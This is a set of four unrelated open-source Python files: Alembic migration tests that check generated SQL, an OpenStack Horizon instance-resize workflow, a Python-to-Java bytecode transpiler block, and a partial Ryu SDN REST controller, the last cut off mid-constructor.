def test_create_unique_index(self):
context = op_fixture()
op.create_index('ik_test', 't1', ['foo', 'bar'], unique=True)
context.assert_(
"CREATE UNIQUE INDEX ik_test ON t1 (foo, bar)"
)
@config.requirements.fail_before_sqla_09
def test_create_index_quote_flag(self):
context = op_fixture()
op.create_index('ik_test', 't1', ['foo', 'bar'], quote=True)
context.assert_(
'CREATE INDEX "ik_test" ON t1 (foo, bar)'
)
def test_create_index_table_col_event(self):
context = op_fixture()
op.create_index('ik_test', 'tbl_with_auto_appended_column', ['foo', 'bar'])
context.assert_(
"CREATE INDEX ik_test ON tbl_with_auto_appended_column (foo, bar)"
)
def test_add_unique_constraint_col_event(self):
context = op_fixture()
op.create_unique_constraint(
'ik_test',
'tbl_with_auto_appended_column', ['foo', 'bar'])
context.assert_(
"ALTER TABLE tbl_with_auto_appended_column "
"ADD CONSTRAINT ik_test UNIQUE (foo, bar)"
)
def test_create_index_schema(self):
context = op_fixture()
op.create_index('ik_test', 't1', ['foo', 'bar'], schema='foo')
context.assert_(
"CREATE INDEX ik_test ON foo.t1 (foo, bar)"
)
def test_drop_index(self):
context = op_fixture()
op.drop_index('ik_test')
context.assert_(
"DROP INDEX ik_test"
)
def test_drop_index_schema(self):
context = op_fixture()
op.drop_index('ik_test', schema='foo')
context.assert_(
"DROP INDEX foo.ik_test"
)
def test_drop_table(self):
context = op_fixture()
op.drop_table('tb_test')
context.assert_(
"DROP TABLE tb_test"
)
def test_drop_table_schema(self):
context = op_fixture()
op.drop_table('tb_test', schema='foo')
context.assert_(
"DROP TABLE foo.tb_test"
)
def test_create_table_selfref(self):
context = op_fixture()
op.create_table(
"some_table",
Column('id', Integer, primary_key=True),
Column('st_id', Integer, ForeignKey('some_table.id'))
)
context.assert_(
"CREATE TABLE some_table ("
"id INTEGER NOT NULL, "
"st_id INTEGER, "
"PRIMARY KEY (id), "
"FOREIGN KEY(st_id) REFERENCES some_table (id))"
)
def test_create_table_fk_and_schema(self):
context = op_fixture()
t1 = op.create_table(
"some_table",
Column('id', Integer, primary_key=True),
Column('foo_id', Integer, ForeignKey('foo.id')),
schema='schema'
)
context.assert_(
"CREATE TABLE schema.some_table ("
"id INTEGER NOT NULL, "
"foo_id INTEGER, "
"PRIMARY KEY (id), "
"FOREIGN KEY(foo_id) REFERENCES foo (id))"
)
eq_(t1.c.id.name, "id")
eq_(t1.schema, "schema")
def test_create_table_no_pk(self):
context = op_fixture()
t1 = op.create_table(
"some_table",
Column('x', Integer),
Column('y', Integer),
Column('z', Integer),
)
context.assert_(
"CREATE TABLE some_table (x INTEGER, y INTEGER, z INTEGER)"
)
assert not t1.primary_key
def test_create_table_two_fk(self):
context = op_fixture()
op.create_table(
"some_table",
Column('id', Integer, primary_key=True),
Column('foo_id', Integer, ForeignKey('foo.id')),
Column('foo_bar', Integer, ForeignKey('foo.bar')),
)
context.assert_(
"CREATE TABLE some_table ("
"id INTEGER NOT NULL, "
"foo_id INTEGER, "
"foo_bar INTEGER, "
"PRIMARY KEY (id), "
"FOREIGN KEY(foo_id) REFERENCES foo (id), "
"FOREIGN KEY(foo_bar) REFERENCES foo (bar))"
)
def test_inline_literal(self):
context = op_fixture()
from sqlalchemy.sql import table, column
from sqlalchemy import String, Integer
account = table('account',
column('name', String),
column('id', Integer)
)
op.execute(
account.update().
where(account.c.name == op.inline_literal('account 1')).
values({'name': op.inline_literal('account 2')})
)
op.execute(
account.update().
where(account.c.id == op.inline_literal(1)).
values({'id': op.inline_literal(2)})
)
context.assert_(
"UPDATE account SET name='account 2' WHERE account.name = 'account 1'",
"UPDATE account SET id=2 WHERE account.id = 1"
)
def test_cant_op(self):
if hasattr(op, '_proxy'):
del op._proxy
assert_raises_message(
NameError,
"Can't invoke function 'inline_literal', as the "
"proxy object has not yet been established "
"for the Alembic 'Operations' class. "
"Try placing this code inside a callable.",
op.inline_literal, "asdf"
)
def test_naming_changes(self):
context = op_fixture()
op.alter_column("t", "c", name="x")
context.assert_("ALTER TABLE t RENAME c TO x")
context = op_fixture()
op.alter_column("t", "c", new_column_name="x")
context.assert_("ALTER TABLE t RENAME c TO x")
context = op_fixture('mysql')
op.drop_constraint("f1", "t1", type="foreignkey")
context.assert_("ALTER TABLE t1 DROP FOREIGN KEY f1")
context = op_fixture('mysql')
op.drop_constraint("f1", "t1", type_="foreignkey")
context.assert_("ALTER TABLE t1 DROP FOREIGN KEY f1")
@config.requirements.fail_before_sqla_084
def test_naming_changes_drop_idx(self):
context = op_fixture('mssql')
op.drop_index('ik_test', tablename='t1')
context.assert_("DROP INDEX ik_test ON t1")
class SQLModeOpTest(TestBase):
@config.requirements.sqlalchemy_09
def test_auto_literals(self):
context = op_fixture(as_sql=True, literal_binds=True)
from sqlalchemy.sql import table, column
from sqlalchemy import String, Integer
account = table('account',
column('name', String),
column('id', Integer)
)
op.execute(
account.update().
where(account.c.name == op.inline_literal('account 1')).
values({'name': op.inline_literal('account 2')})
)
op.execute(text("update table set foo=:bar").bindparams(bar='bat'))
context.assert_(
"UPDATE account SET name='account 2' "
"WHERE account.name = 'account 1'",
"update table set foo='bat'"
)
def test_create_table_literal_binds(self):
context = op_fixture(as_sql=True, literal_binds=True)
op.create_table(
"some_table",
Column('id', Integer, primary_key=True),
Column('st_id', Integer, ForeignKey('some_table.id'))
)
context.assert_(
"CREATE TABLE some_table (id INTEGER NOT NULL, st_id INTEGER, "
"PRIMARY KEY (id), FOREIGN KEY(st_id) REFERENCES some_table (id))"
)
class CustomOpTest(TestBase):
def test_custom_op(self):
from alembic.operations import Operations, MigrateOperation
@Operations.register_operation("create_sequence")
class CreateSequenceOp(MigrateOperation):
"""Create a SEQUENCE."""
def __init__(self, sequence_name, **kw):
self.sequence_name = sequence_name
self.kw = kw
@classmethod
def create_sequence(cls, operations, sequence_name, **kw):
"""Issue a "CREATE SEQUENCE" instruction."""
op = CreateSequenceOp(sequence_name, **kw)
return operations.invoke(op)
@Operations.implementation_for(CreateSequenceOp)
def create_sequence(operations, operation):
operations.execute("CREATE SEQUENCE %s" % operation.sequence_name)
context = op_fixture()
op.create_sequence('foob')
context.assert_("CREATE SEQUENCE foob")
class EnsureOrigObjectFromToTest(TestBase):
"""the to_XYZ and from_XYZ methods are used heavily in autogenerate.
It's critical that these methods, at least the "drop" form,
always return the *same* object if available so that all the info
passed into to_XYZ is maintained in the from_XYZ.
"""
def test_drop_index(self):
schema_obj = schemaobj.SchemaObjects()
idx = schema_obj.index('x', 'y', ['z'])
op = ops.DropIndexOp.from_index(idx)
is_(
op.to_index(), idx
)
def test_create_index(self):
schema_obj = schemaobj.SchemaObjects()
idx = schema_obj.index('x', 'y', ['z'])
op = ops.CreateIndexOp.from_index(idx)
is_(
op.to_index(), idx
)
def test_drop_table(self):
schema_obj = schemaobj.SchemaObjects()
table = schema_obj.table('x', Column('q', Integer))
op = ops.DropTableOp.from_table(table)
is_(
op.to_table(), table
)
def test_create_table(self):
schema_obj = schemaobj.SchemaObjects()
table = schema_obj.table('x', Column('q', Integer))
op = ops.CreateTableOp.from_table(table)
is_(
op.to_table(), table
)
def test_drop_unique_constraint(self):
schema_obj = schemaobj.SchemaObjects()
const = schema_obj.unique_constraint('x', 'foobar', ['a'])
op = ops.DropConstraintOp.from_constraint(const)
is_(
op.to_constraint(), const
)
def test_drop_constraint_not_available(self):
op = ops.DropConstraintOp('x', 'y', type_='unique')
assert_raises_message(
ValueError,
"constraint cannot be produced",
op.to_constraint
)
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from django.views.decorators.debug import sensitive_variables # noqa
from horizon import exceptions
from horizon import forms
from horizon import workflows
from horizon import messages
from openstack_dashboard import api
from openstack_dashboard.usage import quotas
from openstack_dashboard.dashboards.admin.instances \
import utils as instance_utils
LOG = logging.getLogger(__name__)
class ResourceAction(workflows.Action):
checkboxlist = forms.CharField(widget=forms.HiddenInput())
flavor = forms.ChoiceField(label=_("New Flavor"),
help_text=_("Choose the flavor to resize."))
class Meta:
name = _("Flavor Choice")
help_text_template = ("admin/instances/_update_instance_resource_help.html")
def __init__(self, request, context, *args, **kwargs):
self.request = request
self.context = context
super(ResourceAction, self).__init__(request, context, *args, **kwargs)
def clean(self):
cleaned_data = super(ResourceAction, self).clean()
checkbox = cleaned_data.get("checkboxlist", None)
if not checkbox:
error_message=_("No instance option selected")
raise forms.ValidationError(error_message)
select_flavor_id = cleaned_data.get('flavor')
select_flavor = api.nova.flavor_get(self.request, select_flavor_id)
select_flavor_vcpus = select_flavor.vcpus
select_flavor_ram = select_flavor.ram
select_flavor_disk = select_flavor.disk
select_flavor_ephemeral = select_flavor.ephemeral
instance_ids = checkbox.split("_")
resource_allocation_ratio = api.nova.get_resource_allocation_ratio(self.request)
ram_allocation = resource_allocation_ratio.get('ram_allocation', 1.5)
cpu_allocation = resource_allocation_ratio.get('cpu_allocation', 16.0)
disk_allocation = resource_allocation_ratio.get('disk_allocation', 1.0)
flug =0
tenant_resources = {}
server_hosts = {}
for instance_id in instance_ids:
instance = api.nova.server_get(self.request, instance_id)
instance_host = getattr(instance, 'vm_node', None)
flavor_id = instance.flavor['id']
if flavor_id == select_flavor_id:
flug =1
break
flavor = api.nova.flavor_get(self.request, flavor_id)
if select_flavor_disk < flavor.disk or select_flavor_ephemeral < flavor.ephemeral:
flug =2
break
if server_hosts.has_key(instance_host):
server_hosts[instance_host]['vcpus'] += instance.vcpus
server_hosts[instance_host]['rams'] += instance.rams
instance_disk = flavor.disk + flavor.ephemeral
server_hosts[instance_host]['disks'] += instance_disk
server_hosts[instance_host]['count'] += 1
else:
server_hosts[instance_host] ={}
server_hosts[instance_host]['vcpus'] = instance.vcpus
server_hosts[instance_host]['rams'] = instance.rams
server_hosts[instance_host]['disks'] = flavor.disk + flavor.ephemeral
server_hosts[instance_host]['count'] = 1
if tenant_resources.has_key(instance.tenant_id):
tenant_resources[instance.tenant_id]['vcpus'] = tenant_resources[instance.tenant_id]['vcpus'] + instance.vcpus
tenant_resources[instance.tenant_id]['rams'] = tenant_resources[instance.tenant_id]['rams'] + instance.rams
tenant_resources[instance.tenant_id]['count'] = tenant_resources[instance.tenant_id]['count'] + 1
else:
tenant_resources[instance.tenant_id] ={}
tenant_resources[instance.tenant_id]['vcpus']=instance.vcpus
tenant_resources[instance.tenant_id]['rams']=instance.rams
tenant_resources[instance.tenant_id]['count']=1
server_error =[]
hypervisors = api.nova.hypervisor_list(self.request)
for hypervisor in hypervisors:
hypervisor_hostname = hypervisor.hypervisor_hostname
server_name = hypervisor_hostname.split('.')[0]
if server_hosts.has_key(server_name):
if hypervisor.hypervisor_type =="xen":
total_vcpus = hypervisor.vcpus
total_rams = hypervisor.memory_mb
total_disk = hypervisor.local_gb
avail_vcpus = total_vcpus - hypervisor.vcpus_used + server_hosts[instance_host]['vcpus']
avail_rams = total_rams - hypervisor.memory_mb_used + server_hosts[instance_host]['rams']
avail_disk = total_disk - hypervisor.local_gb_used + server_hosts[instance_host]['disks']
else:
total_vcpus = hypervisor.vcpus * cpu_allocation
total_rams = hypervisor.memory_mb * ram_allocation
total_disk = hypervisor.local_gb * disk_allocation
avail_vcpus = total_vcpus - hypervisor.vcpus_used + server_hosts[instance_host]['vcpus']
avail_rams = total_rams - hypervisor.memory_mb_used + server_hosts[instance_host]['rams']
avail_disk = total_disk - hypervisor.local_gb_used + server_hosts[instance_host]['disks']
request_vcpus = server_hosts[instance_host]['count'] * select_flavor_vcpus
request_rams = server_hosts[instance_host]['count'] * select_flavor_ram
request_disk = server_hosts[instance_host]['count'] * (select_flavor_disk + select_flavor_ephemeral)
if avail_vcpus < request_vcpus:
flug = 3
server_error.append(_("Compute Node %(server_name)s:VCPU:(Available:%(avail)s, Requestd:%(req)s)")
% {'server_name': server_name, 'avail': avail_vcpus, 'req':request_vcpus})
if avail_rams < request_rams:
flug = 3
server_error.append(_("Compute Node %(server_name)s:RAM:(Available:%(avail)s(MB), Requestd:%(req)s(MB))")
% {'server_name': server_name, 'avail': avail_rams, 'req':request_rams})
if avail_disk < request_disk:
flug = 3
server_error.append(_("Compute Node %(server_name)s:Disk:(Available:%(avail)s(GB), Requestd:%(req)s(GB))")
% {'server_name': server_name, 'avail': avail_disk, 'req':request_disk})
if flug !=3:
count_error =[]
for tenant_id in tenant_resources.keys():
select_resource_vcpus = tenant_resources[tenant_id]['count'] * select_flavor_vcpus
select_resource_rams = tenant_resources[tenant_id]['count'] * select_flavor_ram
tenant = api.keystone.tenant_get(self.request, tenant_id)
#wengshuhua TODO
#usages = quotas.tenant_quota_usages(self.request, pool=tenant.name)
usages = quotas.tenant_quota_usages(self.request)
available_vcpus = usages['cores']['available'] + tenant_resources[tenant_id]['vcpus']
available_ram = usages['ram']['available'] + tenant_resources[tenant_id]['rams']
if available_vcpus < select_resource_vcpus:
flug = 4
count_error.append(_("Pool %(pool)s:VCPU(Available: %(avail)s(MB),"
"Requested: %(req)s(MB))") % {'pool':tenant.name, 'avail': available_vcpus, 'req': select_resource_vcpus})
if available_ram < select_resource_rams:
flug = 4
count_error.append(_("Pool(%(pool)s):RAM(Available: %(avail)s,"
"Requested: %(req)s)") % {'pool':tenant.name, 'avail': available_ram, 'req': select_resource_rams})
if flug ==1:
msg = _("The flavor is same as the origin flavor of some instances you select.Please reselect.")
self._errors['flavor'] = self.error_class([msg])
elif flug ==2:
msg = _("The disk of selected flavor is lower than the origin disk of some instances.Please reselect.")
self._errors['flavor'] = self.error_class([msg])
elif flug == 3:
if server_error:
value_str = ", ".join(server_error)
msg = (_('The instance cannot be updated. '
'The following requested resource(s) exceed '
'quota(s): %s.') % value_str)
self._errors['flavor'] = self.error_class([msg])
elif flug == 4:
if count_error:
value_str = ", ".join(count_error)
msg = (_('The instance cannot be updated. '
'The following requested resource(s) exceed '
'quota(s): %s.') % value_str)
self._errors['flavor'] = self.error_class([msg])
return cleaned_data
def populate_flavor_choices(self, request, context):
flavors = context.get("flavors").values()
if len(flavors) > 1:
flavors = instance_utils.sort_flavor_list(request, flavors)
if flavors:
flavors.insert(0, ("", _("Select a New Flavor")))
else:
flavors.insert(0, ("", _("No flavors available")))
return flavors
class Resource(workflows.Step):
action_class = ResourceAction
contributes = ("flavors", "flavor", "checkboxlist")
def contribute(self, data, context):
if data:
context['checkboxlist'] = data.get("checkboxlist", None)
checkbox = data.get("checkboxlist", None)
context['instance_ids'] = checkbox.split("_")
context['flavor'] = data.get("flavor", None)
return context
class UpdateInstanceResource(workflows.Workflow):
slug = "update instance resource"
name = _("Resize Instance")
success_message = _('Update %(count)s.')
failure_message = _('Unable to update %(count)s.')
success_url = "horizon:admin:instances:index"
multipart = True
default_steps = (Resource,)
def format_status_message(self, message):
checkboxlist = self.context.get('checkboxlist', '')
checkbox = checkboxlist.split("_")
name = self.context.get('name', 'unknown instance')
instance_ids = self.context['instance_ids']
count = len(instance_ids)
if int(count) > 1:
return message % {"count": _("%s instances") % count}
else:
return message % {"count": _("%s instance") % count}
@sensitive_variables('context')
def handle(self, request, context):
try:
flavor = context['flavor']
#wengshuhua TODO
#for instance_id in context['instance_ids']:
# names = api.nova.dev_snapshot_list(request, instance_id)
# if names:
# for name in names:
# api.nova.dev_snapshot_delete(request, instance_id, name.snapshotname)
LOG.info("========================= horizion -> horizon API:server_batch_resize=================")
api.nova.server_batch_resize(request, context['instance_ids'], flavor, disk_config=None)
return True
except Exception:
exceptions.handle(request)
return False
|
|
import dis
from ..java import (
Code as JavaCode,
opcodes as JavaOpcodes,
ExceptionInfo as JavaExceptionInfo,
LineNumberTable
)
from .utils import extract_command, find_blocks
from .opcodes import ASTORE_name, ALOAD_name, ADELETE_name, IF, END_IF, resolve_jump
class IgnoreBlock(Exception):
"""An escape hatch; enable a block to be flagged as ignorable"""
pass
class Block:
def __init__(self, parent=None, commands=None):
self.parent = parent
self.commands = commands if commands else []
self.localvars = {}
self.code = []
self.try_catches = []
self.blocks = []
self.jumps = []
self.jump_targets = {}
self.unknown_jump_targets = {}
self.next_resolve_list = []
self.next_opcode_starts_line = None
@property
def module(self):
return self.parent
def store_name(self, name, arguments, allow_locals=True):
if allow_locals:
self.add_opcodes(
ASTORE_name(self, name)
)
else:
self.add_opcodes(
ASTORE_name(self, '#TEMP#'),
JavaOpcodes.GETSTATIC(self.klass.descriptor, 'attrs', 'Ljava/util/Hashtable;'),
JavaOpcodes.LDC(name),
ALOAD_name(self, '#TEMP#'),
JavaOpcodes.INVOKEVIRTUAL('java/util/Hashtable', 'put', '(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;'),
JavaOpcodes.POP(),
)
def load_name(self, name, allow_locals=True):
try:
# Look for a local first.
if allow_locals:
self.add_opcodes(
ALOAD_name(self, name)
)
else:
raise KeyError('Not scanning locals')
except KeyError:
self.add_opcodes(
# If there isn't a local, look for a global
JavaOpcodes.GETSTATIC(self.module.descriptor, 'globals', 'Ljava/util/Hashtable;'),
JavaOpcodes.LDC(name),
JavaOpcodes.INVOKEVIRTUAL('java/util/Hashtable', 'get', '(Ljava/lang/Object;)Ljava/lang/Object;'),
# If there's nothing in the globals, then look for a builtin.
IF(
[JavaOpcodes.DUP()],
JavaOpcodes.IFNONNULL
),
JavaOpcodes.POP(),
JavaOpcodes.GETSTATIC('org/Python', 'builtins', 'Ljava/util/Hashtable;'),
JavaOpcodes.LDC(name),
JavaOpcodes.INVOKEVIRTUAL('java/util/Hashtable', 'get', '(Ljava/lang/Object;)Ljava/lang/Object;'),
# If we still don't have something, throw a NameError.
IF(
[JavaOpcodes.DUP()],
JavaOpcodes.IFNONNULL
),
JavaOpcodes.POP(),
JavaOpcodes.NEW('org/python/exceptions/NameError'),
JavaOpcodes.DUP(),
JavaOpcodes.LDC(name),
JavaOpcodes.INVOKESPECIAL('org/python/exceptions/NameError', '<init>', '(Ljava/lang/String;)V'),
JavaOpcodes.ATHROW(),
END_IF(),
END_IF(),
# Make sure we actually have a Python object
JavaOpcodes.CHECKCAST('org/python/types/Object')
)
def delete_name(self, name, allow_locals=True):
try:
# Look for a local first.
if allow_locals:
self.add_opcodes(
ADELETE_name(self, name)
)
else:
raise KeyError('Not scanning locals')
except KeyError:
self.add_opcodes(
# If there isn't a local, look for a global
JavaOpcodes.GETSTATIC(self.module.descriptor, 'globals', 'Ljava/util/Hashtable;'),
JavaOpcodes.LDC(name),
JavaOpcodes.INVOKEVIRTUAL('java/util/Hashtable', 'remove', '(Ljava/lang/Object;)Ljava/lang/Object;'),
)
def extract(self, code, debug=False):
"""Break a code object into the parts it defines, populating the
provided block.
"""
instructions = list(dis.Bytecode(code))
blocks = find_blocks(instructions)
i = len(instructions)
commands = []
while i > 0:
i, command = extract_command(instructions, blocks, i)
commands.append(command)
commands.reverse()
if True:
print ('=====' * 10)
print (code)
print ('-----' * 10)
for command in commands:
command.dump()
print ('=====' * 10)
# Append the extracted commands to any pre-existing ones.
self.commands.extend(commands)
def tweak(self):
"""Tweak the bytecode generated for this block."""
pass
def add_opcodes(self, *opcodes):
# Add the opcodes to the code list and process them.
for opcode in opcodes:
# print("ADD OPCODE", id(opcode), opcode)
if opcode.process(self):
self.code.append(opcode)
# If we've flagged a code line change, attach that to the opcode
if self.next_opcode_starts_line:
opcode.starts_line = self.next_opcode_starts_line
self.next_opcode_starts_line = None
# Resolve any references to the "next" opcode.
for (obj, attr) in self.next_resolve_list:
# print(" resolve %s reference on %s %s with %s %s" % (attr, obj, id(obj), opcode, id(opcode)))
setattr(obj, attr, opcode)
self.next_resolve_list = []
def stack_depth(self):
"Evaluate the maximum stack depth required by a sequence of Java opcodes"
depth = 0
max_depth = 0
for opcode in self.code:
# print(" ", opcode, depth)
depth = depth + opcode.stack_effect
if depth > max_depth:
max_depth = depth
return max_depth
def ignore_empty(self):
if len(self.code) == 1 and isinstance(self.code[0], JavaOpcodes.RETURN):
raise IgnoreBlock()
elif len(self.code) == 2 and isinstance(self.code[1], JavaOpcodes.ARETURN):
raise IgnoreBlock()
def void_return(self):
"""Ensure that end of the code sequence is a Java-style return of void.
Java has a separate opcode for VOID returns, which is different to
RETURN NULL. Replace "SET NULL" "ARETURN" pair with "RETURN".
"""
if len(self.code) >= 2 and isinstance(self.code[-2], JavaOpcodes.ACONST_NULL) and isinstance(self.code[-1], JavaOpcodes.ARETURN):
return_opcode = JavaOpcodes.RETURN()
# Update the jump operation to point at the new return opcode.
for opcode in self.code[-1].references:
opcode.jump_op = return_opcode
return_opcode.references.append(opcode)
for opcode in self.code[-2].references:
opcode.jump_op = return_opcode
return_opcode.references.append(opcode)
# Then, check to see if either opcode had a line number association.
# if so, preserve the first one.
if self.code[-2].starts_line is not None:
return_opcode.starts_line = self.code[-2].starts_line
elif self.code[-1].starts_line is not None:
return_opcode.starts_line = self.code[-1].starts_line
self.code = self.code[:-2] + [return_opcode]
def transpile(self):
"""Create a JavaCode object representing the commands stored in the block
May raise ``IgnoreBlock`` if the block should be ignored.
"""
# Convert the sequence of commands into instructions.
# Most of the instructions will be opcodes. However, some will
# be instructions to add exception blocks, line number references, etc
for cmd in self.commands:
cmd.transpile(self)
# Java requires that every body of code finishes with a return.
# Make sure there is one.
if len(self.code) == 0 or not isinstance(self.code[-1], (JavaOpcodes.RETURN, JavaOpcodes.ARETURN)):
self.add_opcodes(JavaOpcodes.RETURN())
# Since we've processed all the Python opcodes, we can now resolve
# all the unknown jump targets.
# print('>>>>> Resolve references')
for target, references in self.unknown_jump_targets.items():
# print(" resolving %s references to %s" % (len(references), target))
for opcode, position in references:
resolve_jump(opcode, self, target, position)
# Provide any tweaks that are needed because of the context in which
# the block is being used.
# print('>>>>> Tweak opcodes')
self.tweak()
# Now that we have a complete opcode list, postprocess the list
# with the known offsets.
offset = 0
# print('>>>>> set offsets')
for index, instruction in enumerate(self.code):
# print("%4d:%4d (%s) %s" % (index, offset, id(instruction), instruction))
instruction.java_index = index
instruction.java_offset = offset
offset += len(instruction)
# print('>>>>> end set offsets')
# Construct the exception table, updating any
# end-of-exception GOTO operations with the right opcode.
# Record a frame range for each one.
exceptions = []
for try_catch in self.try_catches:
# print("TRY CATCH START", id(try_catch), try_catch.start_op, try_catch.start_op.java_offset)
# print(" TRY END", try_catch.try_end_op, try_catch.try_end_op.java_offset)
# print(" END", try_catch.end_op, try_catch.end_op.java_offset)
for handler in try_catch.handlers:
# print(" HANDLER", handler.start_op, handler.end_op, handler.descriptors)
if handler.descriptors:
for descriptor in handler.descriptors:
exceptions.append(JavaExceptionInfo(
try_catch.start_op.java_offset,
try_catch.try_end_op.java_offset,
handler.start_op.java_offset,
descriptor
))
else:
exceptions.append(JavaExceptionInfo(
try_catch.start_op.java_offset,
try_catch.try_end_op.java_offset,
handler.start_op.java_offset,
'org/python/exceptions/BaseException'
))
# Add definitions for the finally block
if try_catch.finally_handler:
# print(" FINALLY", try_catch.finally_handler.start_op.java_offset, try_catch.finally_handler.end_op.java_offset)
exceptions.append(JavaExceptionInfo(
try_catch.start_op.java_offset,
try_catch.try_end_op.java_offset,
try_catch.finally_handler.start_op.java_offset,
None
))
for handler in try_catch.handlers:
# print(" h", handler.descriptors)
exceptions.append(JavaExceptionInfo(
handler.start_op.java_offset,
handler.catch_end_op.java_offset,
try_catch.finally_handler.start_op.java_offset,
None
))
# Update any jump instructions
# print ("There are %s jumps" % len(self.jumps))
for jump in self.jumps:
# print ("JUMP", id(jump), jump, jump.java_offset, jump.jump_op, id(jump.jump_op))
try:
jump.offset = jump.jump_op.java_offset - jump.java_offset
except AttributeError:
jump.offset = jump.jump_op.start_op.java_offset - jump.java_offset
# Construct a line number table from
# the source code reference data on opcodes.
line_numbers = []
for code in self.code:
if code.starts_line is not None:
line_numbers.append((code.java_offset, code.starts_line))
line_number_table = LineNumberTable(line_numbers)
return JavaCode(
max_stack=self.stack_depth() + len(exceptions),
max_locals=len(self.localvars),
code=self.code,
exceptions=exceptions,
attributes=[
line_number_table
]
)
|
|
# Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2012 Isaku Yamahata <yamahata at private email ne jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module provides a basic set of REST API.
# - Network registration
# - End-point port management
# - OpenFlow port number
# - MAC address (for anti-spoofing)
#
# Used by OpenStack Ryu plug-in.
import json
from webob import Response
from ryu.app import wsgi as app_wsgi
from ryu.app.wsgi import ControllerBase, WSGIApplication
from ryu.base import app_manager
from ryu.controller import network
from ryu.exception import NetworkNotFound, NetworkAlreadyExist
from ryu.exception import PortNotFound, PortAlreadyExist
from ryu.lib import dpid as dpid_lib
from ryu.lib import mac as mac_lib
# TODO:XXX
# define db interface and store those information into db
# REST API
# get the list of networks
# GET /v1.0/networks/
#
# register a new network.
# Fail if the network is already registered.
# POST /v1.0/networks/{network-id}
#
# update a new network.
# Success as nop even if the network is already registered.
#
# PUT /v1.0/networks/{network-id}
#
# remove a network
# DELETE /v1.0/networks/{network-id}
#
# get the list of sets of dpid and port
# GET /v1.0/networks/{network-id}/
#
# register a new set of dpid and port
# Fail if the port is already registered.
# POST /v1.0/networks/{network-id}/{dpid}_{port-id}
#
# update a new set of dpid and port
# Success as nop even if same port already registered
# PUT /v1.0/networks/{network-id}/{dpid}_{port-id}
#
# remove a set of dpid and port
# DELETE /v1.0/networks/{network-id}/{dpid}_{port-id}
#
# get the list of mac addresses of dpid and port
# GET /v1.0/networks/{network-id}/{dpid}_{port-id}/macs/
#
# register a new mac address for dpid and port
# Fail if mac address is already registered or the mac address is used
# for other ports of the same network-id
# POST /v1.0/networks/{network-id}/{dpid}_{port-id}/macs/{mac}
#
# update a new mac address for dpid and port
# Success as nop even if same mac address is already registered.
# For now, changing mac address is not allows as it fails.
# PUT /v1.0/networks/{network-id}/{dpid}_{port-id}/macs/{mac}
#
# For now DELETE /v1.0/networks/{network-id}/{dpid}_{port-id}/macs/{mac}
# is not supported. mac address is released when port is deleted.
#
class NetworkController(ControllerBase):
def __init__(self, req, link, data, **config):
super(NetworkController, self).__init__(req, link, data, **config)
self.nw = data
def create(self, req, network_id, **_kwargs):
try:
self.nw.create_network(network_id)
except NetworkAlreadyExist:
return Response(status=409)
else:
return Response(status=200)
def update(self, req, network_id, **_kwargs):
self.nw.update_network(network_id)
return Response(status=200)
def lists(self, req, **_kwargs):
body = json.dumps(self.nw.list_networks())
return Response(content_type='application/json', body=body)
def delete(self, req, network_id, **_kwargs):
try:
self.nw.remove_network(network_id)
except NetworkNotFound:
return Response(status=404)
return Response(status=200)
class PortController(ControllerBase):
def __init__(self, req, link, data, **config):
super(PortController, self).__init__(req, link, data, **config)
self.nw = data
def create(self, req, network_id, dpid, port_id, **_kwargs):
dpid = dpid_lib.str_to_dpid(dpid)
port_id = int(port_id)
try:
self.nw.create_port(network_id, dpid, port_id)
except NetworkNotFound:
return Response(status=404)
except PortAlreadyExist:
return Response(status=409)
return Response(status=200)
def update(self, req, network_id, dpid, port_id, **_kwargs):
dpid = dpid_lib.str_to_dpid(dpid)
port_id = int(port_id)
try:
self.nw.update_port(network_id, dpid, port_id)
except NetworkNotFound:
return Response(status=404)
return Response(status=200)
def lists(self, req, network_id, **_kwargs):
try:
body = json.dumps(self.nw.list_ports(network_id))
except NetworkNotFound:
return Response(status=404)
return Response(content_type='application/json', body=body)
def delete(self, req, network_id, dpid, port_id, **_kwargs):
dpid = dpid_lib.str_to_dpid(dpid)
port_id = int(port_id)
try:
self.nw.remove_port(network_id, dpid, port_id)
except (NetworkNotFound, PortNotFound):
return Response(status=404)
return Response(status=200)
class MacController(ControllerBase):
def __init__(self, req, link, data, **config):
super(MacController, self).__init__(req, link, data, **config)
self.nw = data
def create(self, _req, network_id, dpid, port_id, mac_addr, **_kwargs):
dpid = dpid_lib.str_to_dpid(dpid)
port_id = int(port_id)
mac_addr = mac_lib.haddr_to_bin(mac_addr)
try:
self.nw.create_mac(network_id, dpid, port_id, mac_addr)
except PortNotFound:
return Response(status=404)
except network.MacAddressAlreadyExist:
return Response(status=409)
return Response(status=200)
def update(self, _req, network_id, dpid, port_id, mac_addr, **_kwargs):
dpid = dpid_lib.str_to_dpid(dpid)
port_id = int(port_id)
mac_addr = mac_lib.haddr_to_bin(mac_addr)
try:
self.nw.update_mac(network_id, dpid, port_id, mac_addr)
except PortNotFound:
return Response(status=404)
return Response(status=200)
def lists(self, _req, network_id, dpid, port_id, **_kwargs):
dpid = dpid_lib.str_to_dpid(dpid)
port_id = int(port_id)
try:
body = json.dumps([mac_lib.haddr_to_str(mac_addr) for mac_addr in
self.nw.list_mac(dpid, port_id)])
except PortNotFound:
return Response(status=404)
return Response(content_type='application/json', body=body)
class RestAPI(app_manager.RyuApp):
_CONTEXTS = {
'network': network.Network,
'wsgi': WSGIApplication
}
def __init__(self, *args, **kwargs):
super(RestAPI, self).__init__(*args, **kwargs)
self.nw = kwargs['network']
wsgi = kwargs['wsgi']
